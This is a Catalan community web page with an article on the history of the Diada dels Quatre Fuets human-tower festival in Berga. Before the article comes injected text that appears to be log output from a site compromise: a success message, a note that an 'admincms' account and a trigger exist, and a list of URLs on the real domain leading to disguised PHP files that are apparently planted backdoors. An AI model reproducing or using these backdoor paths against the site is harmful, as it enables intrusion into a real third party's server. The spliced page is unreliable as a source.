Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?wp https://castellersdeberga.cat/wp-admin/includes/class-wp-site-health-core-cron.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-ms-users-list-table-cron-stream-wp-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/options-meta-stream-private-wp-cron-cron-cron.php https://castellersdeberga.cat/wp-content/plugins/qode-instagram-widget/load-cron-core-stream.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/woocommerce-redsys-ajax-meta-private-private-ajax-response-wp-cron.php https://castellersdeberga.cat/wp-includes/class-walker-comment-wp.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-base64-cron-ajax-response-stream-private-core-wp-meta.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Sobre la Diada dels Quatre Fuets
 

Sobre la Diada dels Quatre Fuets


Sobre la Diada dels Quatre FuetsDesprés de dos anys de molt poca activitat castellera, a conseqüència de la COVID-19, el 2022 ha començat amb força i es respira certa normalitat. L’última Diada dels Quatre Fuets es va celebrar el 16 de juny de 2019, amb els Minyons de Terrassa, els Capgrossos de Mataró i els Castellers de Berga. Tres anys després, amb les mateixes colles, torna la diada gran dels Castellers de Berga, el diumenge 12 de juny de 2022, a les portes de la Patum de la represa.

A les 7 diades dels Quatre Fuets, hi han actuat un total de 9 colles diferents (comptant els amfitrions), entre elles, de les millors del país. Els Minyons de Terrassa i els Capgrossos de Mataró compliran la seva quarta participació aquest 2022, i es convertiran en les colles més habituals a la cita. El 2012 els Castellers de Berga ja existien però no van fer el seu bateig fins el 7 de juliol, per tant, aquell 2012 no es va organitzar la Diada dels Quatre Fuets i la primera edició fou la del 2013. Sempre s’ha celebrat el diumenge abans de Patum, menys el 2016 que es va traslladar al dissabte a la tarda, per la coincidència amb els actes del 125è aniversari dels Gegants Nous de la Patum i el 150è dels Gegants Vells.

Al ser una diada on les colles acostumen a anar a màxims, s’hi han viscut uns quants èxits i també algunes frustracions. Així i tot, la millor diada que ha viscut mai la Plaça de Sant Pere no és durant uns Quatre Fuets sinó la que es va celebrar el 12 de juny de 2011, abans de la creació dels Castellers de Berga (2012). En aquella ocasió, els Castellers de Vilafranca també van descarregar 4d9f, 3d9f, 5d8 (com als Quatre Fuets del 2014) però, el 2011, van tancar l’actuació descarregant el pilar de 7 amb folre. Com a curiositat, a la Plaça de Sant Pere,  6 colles diferents hi han descarregat el pilar de 6 o superior, 5 colles durant la Diada dels Quatre Fuets i els Castellers de Vilafranca, anteriorment.

Una petita història per a una gran Diada emmarcada dins els actes previs de la Patum, a l’emblemàtic escenari de la Plaça de Sant Pere. Castells, dinar, concert i ja se sent l’olor de pólvora de les maces que, a la Plaça Viladomat, proven la pirotècnia. D’aquí ve el nom de la diada castellera: la tarda del diumenge abans de Corpus, salten les maces  amb l’excusa de comprovar la qualitat dels fuets (petards) d’aquell any. És el primer acte massiu de la Patum que esclatarà definitivament tres dies després amb el Dimecres de Corpus, el primer dels cinc dies grans. Després del parèntesi pandèmic, continuem alçant castells sota el sol i la calor o sota les nuvolades i la pluja, compartint abraçades, alegries i potser alguna llàgrima.